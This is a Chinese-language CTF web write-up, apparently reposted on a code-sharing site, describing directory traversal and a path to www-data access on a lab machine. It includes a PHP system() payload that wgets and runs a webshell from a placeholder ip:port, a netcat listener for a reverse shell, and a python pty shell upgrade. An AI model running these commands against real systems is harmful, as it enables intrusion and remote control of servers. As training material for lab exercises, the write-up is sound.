ctf-web-目錄遍歷(拿到www-data用戶權限)注入思路筆記


目錄遍歷漏洞介紹

路徑遍歷攻擊(也稱為目錄遍歷)旨在訪問存儲在web根文件夾之外的文件和目錄。通過操縱帶有“點-斜線(..)”序列及其變化的文件或使用絕對文件路徑來引用文件的變量,可以訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼、配置和關鍵系統文件。

需要注意的是,系統操作訪問控制(如在微軟Windows操作系統上鎖定或使用文件)限制了對文件的訪問權限。

這種攻擊也稱為“點-點斜線”、“目錄遍歷”、“目錄爬升”和“回溯”。

注入步驟

  1. 信息探測:
    1. image
    2. 發現數據庫管理界面image
  2. 漏洞掃描
    1. 使用owasp-zap進行掃描
      1. image
      2. image
  3. 敏感頁面上傳、執行shell
    1. -- dbadmin敏感目錄有敏感頁面,瀏覽器訪問,使用弱口令嘗試登陸;發現弱口令存在,並登陸成功!
    2. 生成webshell:
      1. imageimage

    3. 登陸頁面之后查找可利用的寫webshell的點;
    4. 新建數據庫,數據表,字段(寫入<?php system("cd /tmp;wget http:/ /ip:port/webshell.php;chmod +x webshell.php;php webshell");?> )
      1. image
      2. image
    5. 創建服務器用於靶場機器下載對應webshell:-- python -m "SimpleHTTPServer”,注意服務器端口和shell地址端口一致
    6. 創建監聽:啟動監聽nc:nc –nlvp  端口號
    7. 執行shell:image
    8. 獲得反彈shell
    9. 啟動終端優化shell:python –c ‘’import pty;pty.spawn(‘/bin/bash’)
  4. 小結:
    1. image


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM